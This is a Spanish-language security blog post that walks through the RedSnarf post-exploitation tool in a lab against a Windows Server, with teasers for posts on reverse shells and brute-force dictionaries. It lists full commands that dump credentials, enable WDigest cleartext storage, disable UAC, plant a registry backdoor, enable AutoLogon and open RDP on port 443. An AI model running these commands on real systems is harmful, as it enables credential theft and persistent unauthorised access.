Analizando Mercado Libre 20th Anniversary Gifts

-
Imagen
 Análisis de mensaje Mercado Libre 20th Anniversary Gifts. En estos días se ha estado compartiendo  un mensaje a través de la aplicación de mensajería Whatsapp, donde supuesta mente Mercado Libre regalara Gifts por su aniversario número 20 y el cual lo catalogan como Phishing. Sin embargo en mi opinión, este no es un ataque de phishing ya que la definición de este es: " El phishing es un tipo de ataque de ingeniería social que se utiliza a menudo para robar datos del usuario, incluidas las credenciales de inicio de sesión y los números de tarjetas de crédito . Ocurre cuando un atacante, disfrazado de entidad confiable, engaña a una víctima para que abra un correo electrónico, mensaje instantáneo o mensaje de texto" De acuerdo a lo anterior y en resumen, el phishing es utilizado para robar credenciales o información personal de la victima, en este caso del famoso mensaje no recolecta ningún tipo de información, unicamente solicita sea compartido con más personas para "re
Publicar un comentario

REDSNARF RECUPERAR CREDENCIALES DE WINDOWS

-

REDSNARF RECUPERAR CREDENCIALES DE WINDOWS

¿Qué es RedSnarf?
Es un artefacto desarrollado por NCCGROUP y se encuentra en GitHub como código abierto, se utiliza en la post-explotación, sus desarrolladores son, Ed William y Richard Davy, está opera en técnicas de Seguridad Operativa (OpSec Safe Techniques).
El objetivo es:
  1. Ø  No dejar evidencia sobre el host de intrusión/ex filtración, incluye archivos, procesos y servicios.
  2. Ø  No causa daños indebidos al host, es decir, forzar el reinicio del host.


¿Para qué se utiliza?
Es usado para la recuperación de hashes y credenciales de equipos Windows, como servidores y controladores de dominio. También extrae información del sistema, recuperar contraseñas, habilitar el acceso remoto, ejecutar shells remoto.
En la actualidad existen varias herramientas de post-explotación (smbexec y Metasploit), que defiere en eso:
  • Ø  Fácil de usar.
  • Ø  Liviano con menos de 500 líneas de código.
  • Ø  Es modular y enhebrado.
  •  

Desarrollo de la herramienta

Las pruebas se realizaron en una máquina con Windows server 2016, con ip 192.168.1.70.


La máquina atacante (kali linux) tiene la ip 192.168.1.65.


Deberemos de instalar Redsnarf con el siguiente comando:
# sudo apt-get install redsnarf



Ahora vamos a ejecutar algunos comandos predeterminados.

Recopilación de información
Copie la carpeta de políticas y guiones de un Controlador de Dominio y analice la contraseña y el administrador (no me funciono).
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -uP y

  
Mostar lista de tarea en NT AUTHORITY\SYSTEM
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -eT y


Misceláneo
Inicia una shell en una máquina usando credenciales de administrador local
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -uD y


Directiva de token de acceso local
Crea un archivo por lotes lat.bat que puede copiar y pegar en la máquina remota para ejecutar, lo que modificará el registro y habilitará o deshabilitar la configuración de la política de token de acceso local.
# redsnarf -rL y


Wdigest
Habilita el valor de registro de UseLogonCredential Wdigest en una máquina utilizando credenciales de administrador de dominio
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rW e



Deshabilitar el valor de registro de UseLogonCredential Wdigest en una maquina utilizando credenciales de administrador de dominio
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rW d




Nota: aquí me pide que me vuelva a conectar nuevamente, podría ser un ataque, jijiji.

Consultar el valor de registro de UseLogonCredential Wdigest en una máquina utilizando credenciales de administrador de dominio
redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rW q



UAC (Control de cuentas de usuario)
Habilitar el valor de registro de AUC en una máquina usando credenciales de administrador de dominio
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rU e



Inhabilitar el valor de registro de AUC en una máquina usando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rU d



Consultar el valor de registro de AUC en una máquina usando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rU q



Puertas traseras
Habilitar puertas trasera valor de registro en una máquina con credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rB e


Nota: Debemos de presionar las teclas Windows + u, y nos mostrará la ventana de cmd.exe.


Deshabilitar el valor de registro backdoor en una máquina usando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rB d


Nota: aquí no podemos utilizar el backdoor nuevamente porque lo deshabilitamos.

Consultar el valor de registro de backdoor en una máquina usando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rB q



AutoLogon
Habilitar el valor de registro de Windows AutoLogon en una máquina utilizando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rA e


Deshabilitar el valor e registro de Windows AutoLogon en una máquina utilizando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rA d


Consultar el valor e registro de Windows AutoLogon en una máquina utilizando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rA q



Bloquear una sesión de usuario de máquina remota usando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u rene -p tati.21 -d . -uL y


En esta parte creamos un usuario “rene” y lo bloqueamos.

RDP (Protocolo de escritorio Remoto)
Habilitar RDP en una máquina usando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rR e



Deshabilita RDP en una máquina usando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rR d


Consulta RDP en una máquina usando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rR q



Cambie el puerto RDP de 3389 a 443.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rT e



Cambiar el puerto RDP el valor predeterminado a 3389 en una máquina usando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rT d



Consultar el valor del puerto RDP en una máquina usando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rT q


Habilitar RDP SingleSessionPerUser en una máquina utilizando credenciales de adminsitrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rM e



Deshabilitar RDP SingleSessionPerUser en una máquina utilizando credenciales de adminsitrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rM d



Consultar el estado de RDP SingleSessionPerUser en una máquina utilizando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rM q



NLA (Autenticación de Nivel de Red)
Habilitar NLA en una máquina utilizando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rN e



Deshabilitar NLA en una máquina utilizando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rN d



Consultar el estado de NLA en una máquina utilizando credenciales de administrador de dominio.
# redsnarf -H ip=192.168.1.70 -u administrador -p tati.21 -d . -rN q


Felices hacking
Y gracias a chock morris por dejarme escribir este post.

Comentarios

Publicar un comentario

Entradas más populares de este blog

Reverse shell & Bind Shell

-
Imagen
¿Que es una Shell? En informática, el término shell se emplea para referirse a aquellos programas que proveen una interfaz de usuario para acceder a los servicios del sistema operativo. Estos pueden ser gráficos o de texto simple, dependiendo del tipo de interfaz que empleen. Los shells están diseñados para facilitar la forma en que se invocan o ejecutan los distintos programas disponibles en el computador. Cabe hacer notar que existen 2 tipos de Shell y estos son: Shells de texto común como bash, emacs, símbolo del sistema de Windows, entre otros. Shells gráfico común como GNome, KDE, XFCE, LXDE, Unity, MacOS Desktop Environment, Escritorio Windows, entre otros.   Shells 1. Reverse shell 2. Bind Shell Reverse shell Un Reverse shell es un tipo de shell en la cual el host (maquina victima) se comunica hacia el host del atacante. El host (maquina del atacante) tiene a la escucha un puerto en el cual recibirá la conexión, que va a usar, para lograr la conexión del int
Leer más

Generar Diccionarios de Ataques con Fuerza Bruta

-
Imagen
Generar Diccionarios de Ataques con Fuerza Bruta ¿Qué es un diccionario? De acuerdo a la definición, un diccionario es un catálogo de palabras de un idioma, ordenadas alfabéticamente, que proporciona su significado ortográfico y su pronunciación, separación silábica. Bueno esto es la definición ahora a lo que nos compete, estos archivos son tan importantes a la hora de hacer un ataque de fuerza bruta, si estamos realizando pentesting, es una parte necesaria en los servicios que estemos auditando y verificar la robustez, si se encuentran en algún diccionario de ataque, deseando acceso al sistema objetivo. Los diccionarios de ataque son las herramientas que debemos tener a la mano (la foto de la novia en la cartera), y si tenemos más variedad de password tendremos mayor probabilidad de acceder al sistema objetivo, se podría complicar si el verdadero password es suficientemente complejo. La definición acertada, es un intento de entrada en un sistema digital que utiliza una
Leer más

TP-LINK WN722N v2 modo monito

-
Imagen
Antena WiFi TP-LINK WN722N v2  TP-LINK WN722Nv2 Hola a todo, en este post vamos hablar un poco sobre el mito que existe sobre la tarjeta de WiFi TP-LINK WN722N v2, el cual es que no se puede poner en modo monitor. Antes de comenzar, quiero decirles que no estén triste, no hicieron una mala inversión, solo basta con investigar un poco y se encuentra la solución. El motivo del porque esta antena no se puede poner en modo monitor cuando recién la compramos, es porque el tipo de chipset el cual es RTL8188EUS, no lo soporta. Para poder dar solución al problema debemos bajar el drive "no oficial del fabricante", el cual fue modificado para permitir utilizar esta antena en modo monitor. Debemos dar gracias al usuario @kimcoder quien es el que libero el driver modificado para poder utilizarlo con kali linux. A la fecha de escribir este post el 10 de Nov del 2019, estoy utilizando la versión de Kali Linux 2019.3 con kernel 5.2.0. Bueno pues dejemos la hablada y vamos a
Leer más